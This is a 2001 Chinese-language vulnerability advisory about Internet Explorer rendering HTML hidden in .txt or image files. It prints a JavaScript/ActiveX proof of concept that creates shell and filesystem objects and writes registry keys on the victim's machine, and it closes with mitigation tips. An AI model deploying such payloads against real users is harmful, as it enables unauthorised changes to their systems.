发信人: williamlong(蓝色月光)
整理人: starseacn(2001-09-06 11:22:28), 站内信件
|
IE 检查扩展名漏洞 (APP,缺陷)
涉及程序:
HTML
描述:
利用IE不检查含HTML语句的文件扩展名能欺骗用户访问病毒页面
详细:
近日发现 IE 存在安全漏洞,它对含有 HTML 语句的文本不检查扩展名。在 NOTEPAD 上写一份 HTML 文件,保存为 .txt。上传至空间服务器,用 IE 访问 URL。发现,IE 把 .txt 误读成 .html.
将扩展名 .txt 改成 .jpg 或者别的非下载类文件。IE 都无法辨认文件类型。
入侵者利用此漏洞,是有能力在 .txt.jpg.png.... 这些被认为是十分安全的页面上做到 html 上所能做的攻击行为。甚至查看信件的用户都不能保证安全。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
以下是攻击测试代码:
<SCRIPT Language="JavaScript" type="text/javascript">
<!--
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good
day to die!");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good
day to die!");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
// -->
</SCRIPT>
受影响系统:
IE4 ,IE5 ,IE5,IE6 ,Microsoft Word ,Microsoft Excel,Microsoft PowerPoint,Microsoft outlook
Express,tencent explorer
不受影响系统:
netscape
from : [email protected]
解决方案:
1)下载杀毒软件!已有的及时更新病毒库。将系统里比较危险的一些程序改名,比如format.com、deltree.exe等
2)邮件附件不要双击直接打开,存到文件夹后,用杀毒程序扫一遍。
3)及时更新系统补丁。
|
|